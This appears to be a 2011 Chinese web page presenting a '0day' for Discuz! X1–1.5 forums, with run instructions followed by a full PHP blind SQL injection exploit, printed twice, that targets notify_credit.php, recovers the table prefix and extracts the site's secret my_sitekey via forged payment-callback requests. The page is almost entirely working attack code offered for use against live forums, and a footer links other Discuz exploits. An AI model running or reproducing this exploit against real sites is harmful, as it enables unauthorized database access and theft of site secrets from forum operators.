最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
2011-07-06 02:07
537 查看
使用方法 把下面内容保存为exp.php 在php环境下运行 php exp.php
===========================================
<?php
print_r(‘
+—————————————————————————+
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit
by toby57 2010.11.05
mail: toby57 at 163 dot com
team: http://www.wolvez.org
+—————————————————————————+
‘);
if ($argc < 2) {
print_r(‘
+—————————————————————————+
Usage: php ‘.$argv[0].’ url [pre]
Example:
php ‘.$argv[0].’ http://localhost/
php ‘.$argv[0].’ http://localhost/ xss_
+—————————————————————————+
‘);
exit;
}
error_reporting(7);
ini_set(‘max_execution_time’, 0);
$url = $argv[1];
$pre = $argv[2]?$argv[2]:’pre_’;
$target = parse_url($url);
extract($target);
$path .= ‘/api/trade/notify_credit.php’;
$hash = array();
$hash = array_merge($hash, range(48, 57));
$hash = array_merge($hash, range(97, 102));
$tmp_expstr = “‘”;
$res = send();
if(strpos($res,’SQL syntax’)==false){var_dump($res);die(‘Oooops.I can NOT hack it.’);}
preg_match(‘/FROM\s([a-zA-Z_]+)forum_order/’,$res,$match);
if($match[1])$pre = $match[1];
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting Where ”=’”;
$res = send();
if(strpos($res,”doesn’t exist”)!==false){
echo “Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n”;
for($i = 1;$i<20;$i++){
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns Where table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND LENGTH(REPLACE(table_name,’forum_post_tableid’,”))=$i AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
$pre = ”;
$hash2 = array();
$hash2 = array_merge($hash2, range(48, 57));
$hash2 = array_merge($hash2, range(97, 122));
$hash2[] = 95;
for($j = 1;$j <= $i; $j++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash2)) {
$char = dechex($k);
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns Where table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND MID(REPLACE(table_name,’forum_post_tableid’,”),$j,1)=0x{$char} AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
echo chr($k);
$pre .= chr($k);break;
}
}
}
}
if(strlen($pre)){echo “\nCracked…Table_Pre:”.$pre.”\n”;break;}else{die(‘GET Table_pre Failed..’);};
} } };
echo “Please Waiting….\n”;
$sitekey = ”;
for($i = 1;$i <= 32; $i++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash)) {
$char = dechex($k);
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting Where skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
echo chr($k);
$sitekey .= chr($k);break;
}}}}
if(strlen($sitekey)!=32)die(“\n”.’can NOT get the my_sitekey..’);
echo “\n”.’Exploit Successfully.’.”\nmy_sitekey:{$sitekey}”;
exit;
function sign($exp_str){
return md5(“attach=tenpay&mch_vno={$exp_str}&retcode=0&key=”);
}
function send(){
global $host, $path, $tmp_expstr;
$expdata = “attach=tenpay&retcode=0&trade_no=%2527&mch_vno=”.urlencode(urlencode($tmp_expstr)).”&sign=”.sign($tmp_expstr);
$data = “POST $path HTTP/1.1\r\n”;
$data .= “Host: $host\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “Content-Length: “.strlen($expdata).”\r\n”;
$data .= “Connection: Close\r\n\r\n”;
$data .= $expdata;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = ”;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
===========================================
<?php
print_r(‘
+—————————————————————————+
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit
by toby57 2010.11.05
mail: toby57 at 163 dot com
team: http://www.wolvez.org
+—————————————————————————+
‘);
if ($argc < 2) {
print_r(‘
+—————————————————————————+
Usage: php ‘.$argv[0].’ url [pre]
Example:
php ‘.$argv[0].’ http://localhost/
php ‘.$argv[0].’ http://localhost/ xss_
+—————————————————————————+
‘);
exit;
}
error_reporting(7);
ini_set(‘max_execution_time’, 0);
$url = $argv[1];
$pre = $argv[2]?$argv[2]:’pre_’;
$target = parse_url($url);
extract($target);
$path .= ‘/api/trade/notify_credit.php’;
$hash = array();
$hash = array_merge($hash, range(48, 57));
$hash = array_merge($hash, range(97, 102));
$tmp_expstr = “‘”;
$res = send();
if(strpos($res,’SQL syntax’)==false){var_dump($res);die(‘Oooops.I can NOT hack it.’);}
preg_match(‘/FROM\s([a-zA-Z_]+)forum_order/’,$res,$match);
if($match[1])$pre = $match[1];
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting Where ”=’”;
$res = send();
if(strpos($res,”doesn’t exist”)!==false){
echo “Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n”;
for($i = 1;$i<20;$i++){
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns Where table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND LENGTH(REPLACE(table_name,’forum_post_tableid’,”))=$i AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
$pre = ”;
$hash2 = array();
$hash2 = array_merge($hash2, range(48, 57));
$hash2 = array_merge($hash2, range(97, 122));
$hash2[] = 95;
for($j = 1;$j <= $i; $j++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash2)) {
$char = dechex($k);
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns Where table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND MID(REPLACE(table_name,’forum_post_tableid’,”),$j,1)=0x{$char} AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
echo chr($k);
$pre .= chr($k);break;
}
}
}
}
if(strlen($pre)){echo “\nCracked…Table_Pre:”.$pre.”\n”;break;}else{die(‘GET Table_pre Failed..’);};
} } };
echo “Please Waiting….\n”;
$sitekey = ”;
for($i = 1;$i <= 32; $i++){
for ($k = 0; $k <= 255; $k++) {
if(in_array($k, $hash)) {
$char = dechex($k);
$tmp_expstr = “‘ UNION ALL Select 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting Where skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ”=’”;
$res = send();
if(strpos($res,’SQL syntax’)!==false){
echo chr($k);
$sitekey .= chr($k);break;
}}}}
if(strlen($sitekey)!=32)die(“\n”.’can NOT get the my_sitekey..’);
echo “\n”.’Exploit Successfully.’.”\nmy_sitekey:{$sitekey}”;
exit;
function sign($exp_str){
return md5(“attach=tenpay&mch_vno={$exp_str}&retcode=0&key=”);
}
function send(){
global $host, $path, $tmp_expstr;
$expdata = “attach=tenpay&retcode=0&trade_no=%2527&mch_vno=”.urlencode(urlencode($tmp_expstr)).”&sign=”.sign($tmp_expstr);
$data = “POST $path HTTP/1.1\r\n”;
$data .= “Host: $host\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “Content-Length: “.strlen($expdata).”\r\n”;
$data .= “Connection: Close\r\n\r\n”;
$data .= $expdata;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = ”;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
相关文章推荐
- DiscuzX1-1.5 Sql 0day!!
- Discuz论坛完美搬家 详细分享我的DZ搬家步骤
- Discuz! X1 论坛 全新安装图文教程
- [DZ X2.5实用教程] DZ X2.5(Discuz!)论坛-QQ企业OR域名邮箱作为发信邮箱设置教程
- Nginx实战基础篇七 最新源码包通过脚本部署LAMP搭建Discuz论坛 推荐
- 【Discuz】dz3.2论坛搬家心得
- Discuz! X1.5 getshell 0day
- DISCUZ! X1.5 X2.0RC完美解决用户组上传论坛附件大小限制!
- 两个方法解决DZ(Discuz ! x3.2 )论坛安装模板不是正版应用的问题
- 最新易想团购系统通杀SQL注入漏洞分析附利用exp
- phpcms 2008最新0day加批量EXP代码
- DZ论坛横排美化,代码详细分析[Discuz 7.0]
- 多站点RSS新闻正文抓取,导入discuz论坛,自动发帖的实现(二)
- 海河写的 Discuz论坛帖子调用js的php代码
- discuz x3 怎样设置,打开默认的是门户页面,而不是论坛
- 参考Dedecms整合Discuz完全攻略实现最新的结合
- 程序员联盟有自己的论坛啦!基于Discuz构建,还不来注册~
- 安装LAMP部署Discuz论坛脚本
- 织梦系统与discuz论坛整合方法
- 2011两部最新著作目录抢先爆光